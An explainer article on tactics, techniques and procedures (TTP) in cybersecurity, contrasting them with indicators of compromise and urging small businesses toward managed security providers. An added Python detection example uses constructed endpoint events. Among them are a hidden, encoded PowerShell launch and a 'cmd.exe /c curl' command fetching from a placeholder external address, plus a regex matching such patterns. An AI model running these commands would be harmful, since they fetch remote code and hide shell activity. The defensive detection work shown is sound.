What Is Tactics, Techniques, and Procedures (TTP) in Cybersecurity?

TTP in Cybersecurity

There’s no shortage of confusing terminology and acronyms in the cybersecurity field. In this article, we’re looking at TTP. It’s not reserved for those who make a living defending against cybersecurity threats; it’s an acronym that everyone should know.

What Does TTP Mean in Cybersecurity?

TTP stands for tactics, techniques, and procedures. This acronym describes the behavior of a threat actor at three levels – the “how,” the “what,” and the “why.”

What are Tactics in Cybersecurity?

Tactics are the high-level plans of what cybercriminals intend to achieve. They are the general strategies threat actors use to gain access to systems and information. Tactics are the “why”: why a technique is being attempted and what the attack is meant to achieve.

Why do they want access in the first place? A few examples might be:  

  • To gather your personal data to sell on the Dark Web.  
  • To remove your access to important resources to damage your finances or reputation. 
  • To use your confidential information for fraud, espionage, blackmail, etc. 

What Are Techniques in Cybersecurity? 

Techniques are the intermediate methods or tools a cybercriminal uses to breach your defenses. They provide a more detailed description in the context of the tactic, and they answer the “what” of the threat actor’s behavior.

They correspond to the major cyber threats, such as:  

What Are Procedures in Cybersecurity? 

Procedures are the lower-level, highly detailed steps cybercriminals follow to achieve their goals. They describe “how” the threat actor will achieve the desired result.

The steps may correspond to specific software vulnerabilities. An example of this type of exploitation is the Microsoft Exchange server elevation of privilege vulnerability. Another procedure might detail how they will take advantage of the gaps in your defenses. 

MITRE is a not-for-profit organization that provides a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. They report that collecting and filtering data based on TTPs is an effective method for detecting malicious activity.

“This approach is effective because the technology on which adversaries operate (e.g., Microsoft Windows) constrains the number and types of techniques they can use to accomplish their goals post-compromise,” explains MITRE.

What is TTP Hunting? 

In the world of cybersecurity, being proactive is a must to stay ahead of threat actors. Traditional security solutions involve firewalls, endpoint detection, SIEMs, etc. To get ahead of attackers, proactive tactics are used as well.

Cyber threat hunting involves security analysts looking for potential cyber attacks by searching through networks or datasets to detect and respond to threats that avoid traditional security solutions.  

Once a threat is identified, a security plan is created to protect against it. The analysts’ manual work also feeds the development of automated alerts.

TTP hunting is a form of cyber threat hunting. Analysts focus on threat actor behaviors, attack patterns, and techniques. This process assists in predicting attacks by evaluating the trends of past cyber attacks to identify potential sources. 

Tactics, Techniques, and Procedures (TTP) vs Indicators of Compromise (IoC) 

TTPs shouldn’t be confused with Indicators of Compromise (IoC). TTPs describe what threat actors do and how they will do it. This offers the opportunity to proactively develop contextual understanding across incidents, threat actors, and campaigns.   

TTPs define instances such as victim targeting (e.g., HR representatives of finance companies), attack patterns, and much more. 

IoCs are reactive in nature. They are the breadcrumbs cybersecurity professionals see on a network or operating system that indicate an intrusion is occurring. They provide the opportunity for detection early in an attack sequence.

If cybercriminals were bank robbers, TTPs would be the strategies used to get inside the vault. IoCs are the things you can see that indicate they are there – such as a smashed lock or missing money. 

Let’s demonstrate the difference between IoCs and TTPs during a phishing attack – where their goal is to steal login credentials. 

When detected, IoCs begin incident response activities to protect valuable systems from threat actors. TTPs give the security team the information they need to protect all possible attack paths. 
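To make the TTP-versus-IoC distinction concrete, here is an added example (not from the original article) that runs two detection rules over a constructed set of endpoint process-creation events: an IoC rule keyed on artefacts from a previous incident, and a TTP rule keyed on the behavior itself (an Office application spawning a shell). All hostnames, hashes and addresses are constructed placeholders.

```python
"""IoC-based versus TTP-based detection over constructed endpoint events."""
import re

# Constructed process-creation events, not real telemetry.
EVENTS = [
    {"host": "ws01", "parent": "outlook.exe", "image": "winword.exe",
     "cmdline": "winword.exe /q invoice.docm", "sha256": "hash-of-lure-doc"},
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc <b64>", "sha256": "hash-ps"},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem", "sha256": "hash-ps"},
    {"host": "ws03", "parent": "winword.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl http://198.51.100.7/x", "sha256": "hash-cmd"},
]

# IoC watchlist: static artefacts seen in a previous incident (constructed).
IOC_HASHES = {"hash-of-lure-doc"}
IOC_ADDRESSES = {"203.0.113.9"}


def ioc_matches(events):
    """Reactive rule: flag events whose hash or embedded address is on the list."""
    hits = []
    for e in events:
        if e["sha256"] in IOC_HASHES or any(a in e["cmdline"] for a in IOC_ADDRESSES):
            hits.append(e["host"])
    return hits


# Behavioural rule: the technique is "Office app spawns a command shell",
# which holds regardless of which document, hash or address is involved.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
SUSPICIOUS_ARGS = re.compile(r"-enc\b|-w hidden|/c curl", re.IGNORECASE)


def ttp_matches(events):
    """Proactive rule: flag the parent/child behaviour and note suspicious arguments."""
    hits = []
    for e in events:
        if e["parent"] in OFFICE_APPS and e["image"] in SHELLS:
            reason = "office-spawned-shell"
            if SUSPICIOUS_ARGS.search(e["cmdline"]):
                reason += "+suspicious-args"
            hits.append((e["host"], reason))
    return hits


if __name__ == "__main__":
    print("IoC hits:", ioc_matches(EVENTS))   # only the previously seen lure on ws01
    print("TTP hits:", ttp_matches(EVENTS))   # ws01 and the new variant on ws03
```

The IoC rule only catches the lure document it already knows about, while the behavioral rule also catches the ws03 variant that uses a different document, hash and download address.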

Should SMBs Study TTPs? 

Small and medium-sized businesses (SMBs) rarely employ a cybersecurity team. When they do, they are rarely large enough to dedicate resources to the study of current and emerging TTPs. 

SMBs benefit from outsourcing this activity to a managed security service provider (MSSP). They can provide you with threat intelligence and threat detection services.  

You will profit from a partnership with an experienced MSSP if you have yet to implement beginning-to-end strategies to improve your cybersecurity defenses. Use its experience to implement cybersecurity best practices, such as: 

  • Multi-factor authentication (MFA): Many TTPs used by today’s cybercriminals target weak authentication and login mechanisms. MFA strengthens the authentication process by adding one or more extra layers of protection. This can block as much as 99.9 percent of identity attacks. 
  • Cybersecurity awareness training: People remain the weakest link in the cybersecurity chain. This is because their actions can sabotage even the most well thought out policies and controls. Cybersecurity awareness training can strengthen this link and make it less likely to break. 
  • Endpoint protection: The spread of the hybrid work model led to an explosion of endpoints (laptops, tablets, smartphones, etc.), each of which represents a possible attack path. Modern endpoint protection solutions help discover and defend these endpoints – regardless of where they’re physically located. 
